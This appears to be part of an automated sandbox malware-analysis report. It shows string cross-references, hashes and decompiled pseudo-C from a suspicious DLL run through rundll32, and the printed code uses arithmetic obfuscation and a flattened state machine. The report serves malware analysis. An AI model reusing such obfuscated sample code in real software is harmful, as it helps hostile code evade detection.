0x1000ff89
0x1000ffa0
0x1000ffa5
0x1000ffa8
0x00000000
0x1000ffa8
0x1000ff83
0x1000ff7b
0x1000ff73
0x00000000
0x1000ff67
0x1000fdd0

Strings

!Y, xrefs: 1000F9BA
lV, xrefs: 1000F8FF
zTi-, xrefs: 1000FF60
RESCDIR, xrefs: 1000FFBB
I#>6, xrefs: 1000FF7D
Ln, xrefs: 1000FACE
y+, xrefs: 1000FAA5
!Sn, xrefs: 1000FBD5
P8`u, xrefs: 1000FBF3
zTi-, xrefs: 1000FF3C
y+, xrefs: 1000FA8B, 1000FA94
h^, xrefs: 1000F8EA
:0, xrefs: 1000FB8D
f, xrefs: 1000FD41
1!, xrefs: 1000FD6C
tf, xrefs: 1000FB40
Qf, xrefs: 1000FA12
x., xrefs: 1000F95A
I#>6, xrefs: 10010036
Hc, xrefs: 1000FA66
I#>6, xrefs: 1000FEC0

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !Y$1!$:0$Hc$I#>6$I#>6$I#>6$Ln$P8`u$Qf$RESCDIR$f$h^$lV$tf$x.$y+$y+$zTi-$zTi-$!Sn
API String ID: 0-2463780950
Opcode ID: efcd2f295585981908b3a7feb0db04efecde80df6b2f1b4b7c5ec256f0dfc581
Instruction ID: bc93b57924fd61e523e2fd0e82cecf860c7a9eba1461b4c335491431d6f5d4ef
Opcode Fuzzy Hash: efcd2f295585981908b3a7feb0db04efecde80df6b2f1b4b7c5ec256f0dfc581
Instruction Fuzzy Hash: 1C1222725083818FE364CF25C889A9FBBE2FBC4354F10891DE6D986264D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001A82C, Relevance: 25.4, Strings: 20, Instructions: 390
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E1001A82C(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr* _v132;
				intOrPtr _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				unsigned int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _t432;
				signed int _t436;
				intOrPtr* _t463;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				intOrPtr _t515;
				void* _t516;
				void* _t519;
				void* _t522;
				intOrPtr* _t525;
				signed int* _t526;
				signed int* _t527;
				signed int* _t528;

				_t463 = __ecx;
				_t526 =  &_v312;
				_v300 = 0xbd2e;
				_v300 = _v300 ^ 0x64ca91f9;
				_v300 = _v300 + 0xffff8c4b;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x3264cef1;
				_v184 = 0xdbc4;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00003117;
				_v268 = 0x9d1d;
				_v136 = __edx;
				_t516 = 0x2232b3b9;
				_v132 = __ecx;
				_t506 = 0x39;
				_v268 = _v268 / _t506;
				_v268 = _v268 >> 1;
				_v268 = _v268 << 6;
				_v268 = _v268 ^ 0x00004c83;
				_v308 = 0x5460;
				_v308 = _v308 >> 0x10;
				_v308 = _v308 + 0x7d77;
				_v308 = _v308 << 3;
				_v308 = _v308 ^ 0x0003a260;
				_v192 = 0x89bd;
				_v192 = _v192 + 0xffff13d7;
				_v192 = _v192 ^ 0xffffc185;
				_v232 = 0x81b3;
				_t507 = 0x3d;
				_v232 = _v232 / _t507;
				_t508 = 0x54;
				_v232 = _v232 * 0x1b;
				_v232 = _v232 ^ 0x00007be6;
				_v260 = 0x444c;
				_v260 = _v260 + 0xa661;
				_v260 = _v260 >> 9;
				_v260 = _v260 << 0xa;
				_v260 = _v260 ^ 0x0001e14b;
				_v292 = 0xe8e0;
				_v292 = _v292 >> 5;
				_v292 = _v292 / _t508;
				_t509 = 0x60;
				_v292 = _v292 / _t509;
				_v292 = _v292 ^ 0x00006d5b;
				_v204 = 0xeb94;
				_v204 = _v204 * 0x6c;
				_v204 = _v204 ^ 0x006376b1;
				_v212 = 0x3796;
				_v212 = _v212 + 0x35e;
				_v212 = _v212 << 0xd;
				_v212 = _v212 ^ 0x075eba48;
				_v244 = 0x1352;
				_v244 = _v244 << 5;
				_v244 = _v244 + 0xffff6073;
				_v244 = _v244 ^ 0x0001d834;
				_v144 = 0x59f8;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0x00002e13;
				_v312 = 0x8cf7;
				_v312 = _v312 ^ 0xbf441b39;
				_v312 = _v312 | 0x28cbe9eb;
				_v312 = _v312 >> 2;
				_v312 = _v312 ^ 0x2ff3e9a9;
				_v284 = 0xffa;
				_v284 = _v284 | 0xe9186ba1;
				_v284 = _v284 >> 0xd;
				_v284 = _v284 ^ 0xd21d4053;
				_v284 = _v284 ^ 0xd21a29d9;
				_v220 = 0x2b97;
				_v220 = _v220 + 0xae4a;
				_v220 = _v220 << 0xe;
				_v220 = _v220 ^ 0x3678486c;
				_v236 = 0xfd50;
				_t510 = 0x6c;
				_v236 = _v236 / _t510;
				_v236 = _v236 ^ 0x9f1c3997;
				_v236 = _v236 ^ 0x9f1c5b69;
				_v176 = 0xba6a;
				_v176 = _v176 << 0x10;
				_v176 = _v176 ^ 0xba6a61c0;
				_v296 = 0xf2ab;
				_v296 = _v296 >> 6;
				_v296 = _v296 + 0xfc70;
				_t511 = 0x51;
				_v296 = _v296 / _t511;
				_v296 = _v296 ^ 0x000068ba;
				_v304 = 0x2e74;
				_v304 = _v304 + 0xffff3a6f;
				_v304 = _v304 | 0x7157ede5;
				_v304 = _v304 >> 3;
				_v304 = _v304 ^ 0x1fffc312;
				_v148 = 0xea9a;
				_v148 = _v148 + 0xffff87b8;
				_v148 = _v148 ^ 0x000028e5;
				_v228 = 0xba9a;
				_v228 = _v228 + 0x4fe3;
				_t512 = 0x2c;
				_v228 = _v228 / _t512;
				_v228 = _v228 ^ 0x0000072d;
				_v156 = 0x98f7;
				_v156 = _v156 + 0xffff0467;
				_v156 = _v156 ^ 0xffffa503;
				_v196 = 0xdd3a;
				_v196 = _v196 | 0x1e2ca60c;
				_v196 = _v196 ^ 0x1e2cc1ee;
				_v200 = 0xf4ab;
				_v200 = _v200 + 0xa7c;
				_v200 = _v200 ^ 0x0000b10f;
				_v152 = 0xb61b;
				_v152 = _v152 + 0xffff2699;
				_v152 = _v152 ^ 0xffff8336;
				_v240 = 0xe627;
				_v240 = _v240 ^ 0x0bd8e9ed;
				_v240 = _v240 >> 4;
				_v240 = _v240 ^ 0x00bd9e8d;
				_v168 = 0xe666;
				_v168 = _v168 + 0x78a2;
				_v168 = _v168 ^ 0x00015447;
				_v248 = 0xdb6c;
				_v248 = _v248 + 0xf22e;
				_v248 = _v248 ^ 0x685e4dc9;
				_v248 = _v248 ^ 0x685fea9f;
				_v188 = 0x51ba;
				_v188 = _v188 * 3;
				_v188 = _v188 ^ 0x00008a0d;
				_v224 = 0x1d8e;
				_v224 = _v224 << 0xd;
				_v224 = _v224 | 0x84a5e482;
				_v224 = _v224 ^ 0x87b58dd8;
				_v252 = 0x40ac;
				_v252 = _v252 + 0xffff9f23;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0xdfcf4bf5;
				_v288 = 0x3632;
				_v288 = _v288 << 7;
				_v288 = _v288 << 7;
				_v288 = _v288 ^ 0xb6b0a59c;
				_v288 = _v288 ^ 0xbb3c3b26;
				_v160 = 0xc42b;
				_t513 = 0x55;
				_v160 = _v160 / _t513;
				_v160 = _v160 ^ 0x00002872;
				_v276 = 0x7421;
				_v276 = _v276 + 0xffffcb98;
				_v276 = _v276 ^ 0xf0c79252;
				_v276 = _v276 ^ 0xc0d7c1d4;
				_v276 = _v276 ^ 0x3010741b;
				_v272 = 0xad29;
				_v272 = _v272 + 0xe018;
				_v272 = _v272 ^ 0x2068524c;
				_v272 = _v272 | 0x3a7994d3;
				_v272 = _v272 ^ 0x3a79cc32;
				_v280 = 0x95b2;
				_v280 = _v280 ^ 0x380918ff;
				_v280 = _v280 ^ 0xe70704ef;
				_v280 = _v280 | 0x7ae96ecd;
				_v280 = _v280 ^ 0xffefb4b6;
				_v180 = 0x4ded;
				_t514 = 0x6e;
				_t525 = _a4;
				_t460 = _v136;
				_v180 = _v180 * 0x55;
				_v180 = _v180 ^ 0x0019acfa;
				_v208 = 0xdae3;
				_v208 = _v208 << 4;
				_t515 = _v136;
				_v208 = _v208 / _t514;
				_v208 = _v208 ^ 0x0000287b;
				_v216 = 0x308a;
				_v216 = _v216 ^ 0x02b7a3de;
				_v216 = _v216 ^ 0xfa6741bc;
				_v216 = _v216 ^ 0xf8d0dbd3;
				_v256 = 0x42d;
				_v256 = _v256 ^ 0x167aeac8;
				_v256 = _v256 ^ 0xb7aced8a;
				_v256 = _v256 >> 0xb;
				_v256 = _v256 ^ 0x00141120;
				_v164 = 0x6ef4;
				_v164 = _v164 + 0x121;
				_v164 = _v164 ^ 0x00003438;
				_v264 = 0x58b1;
				_v264 = _v264 | 0x4462e83a;
				_v264 = _v264 + 0xd6e9;
				_v264 = _v264 ^ 0x0a3c556e;
				_v264 = _v264 ^ 0x4e5f821c;
				_v172 = 0x705d;
				_v172 = _v172 * 0x5f;
				_v172 = _v172 ^ 0x0029ca37;
				while(_t516 != 0x1200af6e) {
					if(_t516 == 0x122c380f) {
						_t502 = _v160;
						E1000E2FD(_t515, _v160,  *((intOrPtr*)(_t463 + 4)), _v276,  *_t463);
						_t463 = _v132;
						_t526 =  &(_t526[3]);
						_t516 = 0x35a4eec9;
						_t515 = _t515 +  *((intOrPtr*)(_t463 + 4));
						continue;
					}
					if(_t516 == 0x2232b3b9) {
						_v140 = E10013B73();
						_t516 = 0x386557c0;
						L10:
						_t463 = _v132;
						continue;
					}
					if(_t516 == 0x2d0f7694) {
						_push(_t463);
						_t515 = E1000A0AD(_a4, _t502);
						 *_t525 = _t515;
						__eflags = _t515;
						if(_t515 == 0) {
							L15:
							__eflags = 0;
							return 0;
						}
						_t516 = 0x1200af6e;
						_t460 = _a4 + _t515;
						__eflags = _a4 + _t515;
						goto L10;
					}
					if(_t516 == 0x35a4eec9) {
						_push(0x100013c8);
						E1000BDB3(_v136, __eflags, E10003F0A(_v272, _v280, __eflags), _v208, _t460 - _t515, _v216, _t515);
						E1000717B(_v256, _v164, _v264, _t453, _v172);
						return 1;
					}
					if(_t516 != 0x386557c0) {
						L14:
						__eflags = _t516 - 0x275acb38;
						if(__eflags != 0) {
							continue;
						}
						goto L15;
					}
					_t516 = 0x2d0f7694;
					_a4 =  *((intOrPtr*)(_t463 + 4)) + 0x1000;
				}
				_t432 = E1001BD78(_v192, _v232, _v260,  &_v140, _v292);
				_t527 =  &(_t526[3]);
				_t519 = (_t432 & 0x0000000f) + 4;
				_push( &_v64);
				E1001CDE2(_v204,  &_v140, _v192, _v212, _t519, _v244, _v144);
				 *((char*)(_t527 + _t519 + 0x124)) = 0;
				_t436 = E1001BD78(_v312, _v284, _v220,  &_v140, _v236);
				_t528 =  &(_t527[9]);
				_t522 = (_t436 & 0x0000000f) + 4;
				_push( &_v128);
				E1001CDE2(_v176,  &_v140, _v312, _v296, _t522, _v304, _v148);
				_push(0x10001468);
				 *((char*)(_t528 + _t522 + 0xe4)) = 0;
				_t515 = _t515 + E1001E064( &_v64, __eflags, _t515, _v200, _v136,  &_v128, _v152, _v240, _v168, _v248, _t460 - _t515, E10003F0A(_v228, _v156, __eflags));
				__eflags = _t515;
				_t502 = _v224;
				E1000717B(_v188, _v224, _v252, _t439, _v288);
				_t463 = _v132;
				_t526 =  &(_t528[0x14]);
				_t516 = 0x122c380f;
				goto L14;
			}

0x1001a82c
0x1001a82c
0x1001a832
0x1001a83a
0x1001a842
0x1001a84a
0x1001a84e
0x1001a856
0x1001a861
0x1001a869
0x1001a874
0x1001a884
0x1001a88b
0x1001a894
0x1001a89b
0x1001a8a0
0x1001a8a6
0x1001a8aa
0x1001a8af
0x1001a8b7
0x1001a8bf
0x1001a8c4
0x1001a8cc
0x1001a8d1
0x1001a8d9
0x1001a8e4
0x1001a8ef
0x1001a8fa
0x1001a906
0x1001a90b
0x1001a916
0x1001a919
0x1001a91d
0x1001a925
0x1001a92d
0x1001a935
0x1001a93a
0x1001a93f
0x1001a947
0x1001a94f
0x1001a95c
0x1001a964
0x1001a967
0x1001a96b
0x1001a973
0x1001a980
0x1001a984
0x1001a98c
0x1001a994
0x1001a99c
0x1001a9a1
0x1001a9a9
0x1001a9b1
0x1001a9b6
0x1001a9be
0x1001a9c6
0x1001a9d1
0x1001a9d9
0x1001a9e4
0x1001a9ec
0x1001a9f4
0x1001a9fc
0x1001aa03
0x1001aa0b
0x1001aa13
0x1001aa1b
0x1001aa20
0x1001aa28
0x1001aa30
0x1001aa38
0x1001aa40
0x1001aa45
0x1001aa4d
0x1001aa5b
0x1001aa60
0x1001aa66
0x1001aa6e
0x1001aa76
0x1001aa81
0x1001aa89
0x1001aa94
0x1001aa9c
0x1001aaa1
0x1001aaad
0x1001aab2
0x1001aab8
0x1001aac0
0x1001aac8
0x1001aad0
0x1001aad8
0x1001aadd
0x1001aae5
0x1001aaf0
0x1001aafb
0x1001ab06
0x1001ab0e
0x1001ab1a
0x1001ab1d
0x1001ab21
0x1001ab29
0x1001ab34
0x1001ab3f
0x1001ab4a
0x1001ab55
0x1001ab60
0x1001ab6b
0x1001ab76
0x1001ab81
0x1001ab8c
0x1001ab97
0x1001aba2
0x1001abad
0x1001abb5
0x1001abbd
0x1001abc2
0x1001abca
0x1001abd5
0x1001abe0
0x1001abeb
0x1001abf3
0x1001abfb
0x1001ac03
0x1001ac0b
0x1001ac1e
0x1001ac25
0x1001ac30
0x1001ac38
0x1001ac3d
0x1001ac45
0x1001ac4d
0x1001ac57
0x1001ac5f
0x1001ac64
0x1001ac6c
0x1001ac74
0x1001ac79
0x1001ac7e
0x1001ac86
0x1001ac8e
0x1001aca2
0x1001aca7
0x1001acb0
0x1001acbb
0x1001acc3
0x1001accb
0x1001acd3
0x1001acdb
0x1001ace3
0x1001aceb
0x1001acf3
0x1001acfb
0x1001ad03
0x1001ad0b
0x1001ad13
0x1001ad1b
0x1001ad23
0x1001ad2b
0x1001ad33
0x1001ad46
0x1001ad47
0x1001ad4e
0x1001ad55
0x1001ad5c
0x1001ad67
0x1001ad6f
0x1001ad7a
0x1001ad81
0x1001ad85
0x1001ad8d
0x1001ad95
0x1001ad9d
0x1001ada5
0x1001adad
0x1001adb5
0x1001adbd
0x1001adc5
0x1001adca
0x1001add2
0x1001addd
0x1001ade8
0x1001adf3
0x1001adfb
0x1001ae03
0x1001ae0b
0x1001ae13
0x1001ae1b
0x1001ae2e
0x1001ae35
0x1001ae40
0x1001ae52
0x1001aeeb
0x1001aef7
0x1001aefc
0x1001af03
0x1001af06
0x1001af0b
0x00000000
0x1001af0b
0x1001ae5e
0x1001aed7
0x1001aede
0x1001aebb
0x1001aebb
0x00000000
0x1001aebb
0x1001ae66
0x1001ae9a
0x1001aea3
0x1001aea5
0x1001aea9
0x1001aeab
0x1001b06d
0x1001b06d
0x00000000
0x1001b06d
0x1001aeb4
0x1001aeb9
0x1001aeb9
0x00000000
0x1001aeb9
0x1001ae6e
0x1001b082
0x1001b0ac
0x1001b0c8
0x00000000
0x1001b0d2
0x1001ae7a
0x1001b061
0x1001b061
0x1001b067
0x00000000
0x00000000
0x00000000
0x1001b067
0x1001ae83
0x1001ae8d
0x1001ae8d
0x1001af2e
0x1001af33
0x1001af49
0x1001af4c
0x1001af68
0x1001af78
0x1001af90
0x1001af95
0x1001afab
0x1001afae
0x1001afc7
0x1001afd7
0x1001afdc
0x1001b037
0x1001b037
0x1001b042
0x1001b04d
0x1001b052
0x1001b059
0x1001b05c
0x00000000

Strings

lHx6, xrefs: 1001AA45
{(, xrefs: 1001AD85
|, xrefs: 1001AB76
]p, xrefs: 1001AE1B
!t, xrefs: 1001ACBB
r(, xrefs: 1001ACB0
nU<, xrefs: 1001AE0B
26, xrefs: 1001AC6C
LD, xrefs: 1001A925
{, xrefs: 1001A91D
', xrefs: 1001ABAD
w}, xrefs: 1001A8C4
LRh , xrefs: 1001ACF3
84, xrefs: 1001ADE8
Wq, xrefs: 1001AAD0
[m, xrefs: 1001A96B
(, xrefs: 1001AAFB
M, xrefs: 1001AD33
O, xrefs: 1001AB0E
f, xrefs: 1001ABCA

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !t$'$26$84$LD$LRh $[m$]p$f$lHx6$nU<$r($w}${($|$($M$O${$Wq
API String ID: 0-99976484
Opcode ID: 223801c2cc4881b3ddc4877b8fd3399374567d1bd26fc8e2a82c2a55e485ae83
Instruction ID: acd4ac4d3231cf6e31ee13b5e14a4985f350170532eafe0ebf20155aa7ab5e6d
Opcode Fuzzy Hash: 223801c2cc4881b3ddc4877b8fd3399374567d1bd26fc8e2a82c2a55e485ae83
Instruction Fuzzy Hash: 4D220272508380DFE364CF25C48AA8BBBE2FBC5758F108A1DE5D986260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001539F, Relevance: 24.3, Strings: 19, Instructions: 584
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001539F(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				unsigned int _v1836;
				signed int _t640;
				signed int _t644;
				void* _t645;
				signed int _t674;
				signed int _t680;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				void* _t701;
				signed int _t757;
				signed int _t758;
				signed int _t759;
				signed int _t760;
				signed int _t764;
				unsigned int* _t765;
				void* _t770;

				_t765 =  &_v1836;
				_v1640 = 0x9ed1;
				_v1640 = _v1640 << 4;
				_v1640 = _v1640 ^ 0x0009ed39;
				_v1828 = 0x4475;
				_v1592 = __edx;
				_t759 = 0x270f492f;
				_v1588 = __ecx;
				_t682 = 0xa;
				_v1828 = _v1828 / _t682;
				_v1828 = _v1828 | 0x664197f3;
				_v1828 = _v1828 + 0xffff9f12;
				_v1828 = _v1828 ^ 0x6641015a;
				_v1796 = 0x90c2;
				_v1796 = _v1796 >> 0xa;
				_v1796 = _v1796 | 0x8e9a31fe;
				_v1796 = _v1796 + 0xffff1c7e;
				_v1796 = _v1796 ^ 0x8e991a8d;
				_v1656 = 0x921a;
				_t683 = 0x21;
				_v1656 = _v1656 / _t683;
				_v1656 = _v1656 ^ 0x00002ae4;
				_v1704 = 0x70dd;
				_v1704 = _v1704 ^ 0xefb8cf03;
				_v1704 = _v1704 + 0xecc8;
				_v1704 = _v1704 ^ 0xefb9df7a;
				_v1648 = 0x63fc;
				_t684 = 9;
				_v1648 = _v1648 / _t684;
				_v1648 = _v1648 ^ 0x00000390;
				_v1688 = 0x5306;
				_v1688 = _v1688 + 0x4f;
				_t757 = 0x49;
				_v1688 = _v1688 / _t757;
				_v1688 = _v1688 ^ 0x000046db;
				_v1696 = 0xde59;
				_v1696 = _v1696 + 0x5e7b;
				_v1696 = _v1696 << 8;
				_v1696 = _v1696 ^ 0x013cb205;
				_v1768 = 0xb21e;
				_t685 = 0x28;
				_v1768 = _v1768 / _t685;
				_v1768 = _v1768 >> 2;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x00007e99;
				_v1836 = 0x681b;
				_v1836 = _v1836 | 0x868276cf;
				_v1836 = _v1836 << 5;
				_v1836 = _v1836 >> 0xd;
				_v1836 = _v1836 ^ 0x00069237;
				_v1780 = 0x55b6;
				_v1780 = _v1780 | 0x3a86f450;
				_t686 = 0x37;
				_v1780 = _v1780 / _t686;
				_t687 = 0x5c;
				_v1780 = _v1780 / _t687;
				_v1780 = _v1780 ^ 0x00028002;
				_v1736 = 0xdebb;
				_v1736 = _v1736 << 0xa;
				_t688 = 0xc;
				_v1736 = _v1736 * 0x43;
				_v1736 = _v1736 ^ 0xe92bb4ad;
				_v1744 = 0x28cf;
				_v1744 = _v1744 | 0x522daf15;
				_v1744 = _v1744 / _t688;
				_v1744 = _v1744 ^ 0x06d914f4;
				_v1832 = 0x5722;
				_t689 = 0x60;
				_v1832 = _v1832 / _t689;
				_v1832 = _v1832 << 2;
				_v1832 = _v1832 + 0xffff27bd;
				_v1832 = _v1832 ^ 0xffff1d44;
				_v1752 = 0x1265;
				_t690 = 0x5f;
				_v1752 = _v1752 / _t690;
				_v1752 = _v1752 << 1;
				_v1752 = _v1752 ^ 0x00001c18;
				_v1792 = 0xd1ac;
				_v1792 = _v1792 | 0xf4f7bd6b;
				_t691 = 0x14;
				_v1792 = _v1792 / _t691;
				_v1792 = _v1792 ^ 0x0c3fe825;
				_v1800 = 0x8db3;
				_v1800 = _v1800 + 0xffff68c6;
				_v1800 = _v1800 + 0x1926;
				_v1800 = _v1800 + 0xf67b;
				_v1800 = _v1800 ^ 0x00012b40;
				_v1808 = 0xed7e;
				_t692 = 0x70;
				_v1808 = _v1808 / _t692;
				_v1808 = _v1808 << 1;
				_v1808 = _v1808 ^ 0x8cf05c2a;
				_v1808 = _v1808 ^ 0x8cf05f6a;
				_v1816 = 0xcf42;
				_v1816 = _v1816 | 0xec69bd89;
				_v1816 = _v1816 ^ 0xec81a445;
				_v1816 = _v1816 * 0x70;
				_v1816 = _v1816 ^ 0x65a86482;
				_v1604 = 0xef91;
				_v1604 = _v1604 >> 5;
				_v1604 = _v1604 ^ 0x00004430;
				_v1756 = 0xf464;
				_v1756 = _v1756 | 0x9e0683bc;
				_v1756 = _v1756 >> 9;
				_v1756 = _v1756 ^ 0x004f036f;
				_v1824 = 0x7495;
				_v1824 = _v1824 << 0xb;
				_v1824 = _v1824 * 0x41;
				_t693 = 0x2e;
				_v1824 = _v1824 * 0x64;
				_v1824 = _v1824 ^ 0x80b9cb3f;
				_v1664 = 0x566f;
				_v1664 = _v1664 + 0xffff6a64;
				_v1664 = _v1664 ^ 0xffffdf01;
				_v1672 = 0xe5e0;
				_v1672 = _v1672 + 0xffff19f8;
				_v1672 = _v1672 ^ 0xffffca67;
				_v1720 = 0xa118;
				_v1720 = _v1720 | 0xc1e2d537;
				_v1720 = _v1720 + 0xfffffe5a;
				_v1720 = _v1720 ^ 0xc1e29751;
				_v1748 = 0xa5d3;
				_v1748 = _v1748 + 0xffffc3f2;
				_v1748 = _v1748 + 0xeb01;
				_v1748 = _v1748 ^ 0x0001636e;
				_v1728 = 0xb3a4;
				_v1728 = _v1728 + 0xffff6085;
				_v1728 = _v1728 / _t693;
				_v1728 = _v1728 ^ 0x00003051;
				_v1764 = 0xe0c8;
				_t694 = 0x75;
				_v1764 = _v1764 / _t694;
				_v1764 = _v1764 + 0x780e;
				_t695 = 0x6b;
				_v1764 = _v1764 / _t695;
				_v1764 = _v1764 ^ 0x00003502;
				_v1608 = 0xc148;
				_t696 = 0xb;
				_v1608 = _v1608 / _t696;
				_v1608 = _v1608 ^ 0x000043bf;
				_v1600 = 0x4c2f;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x00001f0b;
				_v1644 = 0xc9d8;
				_v1644 = _v1644 >> 0xb;
				_v1644 = _v1644 ^ 0x00002399;
				_v1612 = 0x99ab;
				_t697 = 7;
				_v1612 = _v1612 / _t697;
				_v1612 = _v1612 ^ 0x00001df9;
				_v1732 = 0x6def;
				_v1732 = _v1732 >> 7;
				_v1732 = _v1732 ^ 0x00004878;
				_v1616 = 0x2b7d;
				_v1616 = _v1616 ^ 0xf0a9b86c;
				_v1616 = _v1616 ^ 0xf0a9e0bd;
				_v1636 = 0x3ef5;
				_v1636 = _v1636 ^ 0x3d1afa43;
				_v1636 = _v1636 ^ 0x3d1aa6d2;
				_v1692 = 0x8d02;
				_v1692 = _v1692 + 0xde26;
				_t698 = 0x6d;
				_v1692 = _v1692 / _t698;
				_v1692 = _v1692 ^ 0x000075dc;
				_v1820 = 0xf0ca;
				_v1820 = _v1820 + 0xffffea39;
				_v1820 = _v1820 + 0xf2e4;
				_v1820 = _v1820 | 0xcde1ca17;
				_v1820 = _v1820 ^ 0xcde1c2f6;
				_v1772 = 0xcdf;
				_v1772 = _v1772 + 0xffffac41;
				_v1772 = _v1772 >> 1;
				_v1772 = _v1772 + 0x1d08;
				_v1772 = _v1772 ^ 0x7fff804a;
				_v1812 = 0x29e0;
				_v1812 = _v1812 + 0x4298;
				_v1812 = _v1812 ^ 0xcc69229e;
				_v1812 = _v1812 << 4;
				_v1812 = _v1812 ^ 0xc694cccf;
				_v1724 = 0x65cc;
				_v1724 = _v1724 ^ 0xea2d0893;
				_v1724 = _v1724 >> 8;
				_v1724 = _v1724 ^ 0x00ea5362;
				_v1788 = 0x5558;
				_v1788 = _v1788 | 0xfcdfdffd;
				_v1788 = _v1788 + 0xffff6daa;
				_v1788 = _v1788 ^ 0xfcdf7cee;
				_v1716 = 0xe9b8;
				_v1716 = _v1716 + 0xffff349c;
				_v1716 = _v1716 >> 8;
				_v1716 = _v1716 ^ 0x00003491;
				_v1700 = 0xa160;
				_v1700 = _v1700 >> 7;
				_v1700 = _v1700 | 0x7f727545;
				_v1700 = _v1700 ^ 0x7f720e1b;
				_v1804 = 0x1967;
				_v1804 = _v1804 + 0x7129;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 ^ 0xe14ed8e7;
				_v1804 = _v1804 ^ 0xe10ba7f5;
				_v1628 = 0x3ca3;
				_v1628 = _v1628 * 0x7e;
				_v1628 = _v1628 ^ 0x001dfd2f;
				_v1652 = 0xd82d;
				_v1652 = _v1652 + 0xffff947b;
				_v1652 = _v1652 ^ 0x00000d4e;
				_v1708 = 0xd600;
				_v1708 = _v1708 + 0xb427;
				_v1708 = _v1708 + 0xffff57a7;
				_v1708 = _v1708 ^ 0x0000d9d1;
				_v1676 = 0x42ee;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 ^ 0x00003a8b;
				_v1660 = 0x9956;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x00007e24;
				_v1740 = 0x8ca6;
				_v1740 = _v1740 << 3;
				_v1740 = _v1740 + 0xfffff96e;
				_v1740 = _v1740 ^ 0x0004389c;
				_v1596 = 0x9f9;
				_v1596 = _v1596 + 0x52b8;
				_v1596 = _v1596 ^ 0x00006fba;
				_v1668 = 0xf3f1;
				_v1668 = _v1668 >> 3;
				_v1668 = _v1668 ^ 0x00003c73;
				_v1684 = 0x7fe3;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 | 0x5488c9ea;
				_v1684 = _v1684 ^ 0x54889371;
				_v1776 = 0x4bf4;
				_v1776 = _v1776 / _t757;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 + 0xffff7fa4;
				_v1776 = _v1776 ^ 0xffff3292;
				_v1784 = 0x3382;
				_v1784 = _v1784 * 0xb;
				_t699 = 0x30;
				_v1784 = _v1784 / _t699;
				_v1784 = _v1784 + 0xffffabca;
				_v1784 = _v1784 ^ 0xffffcf0e;
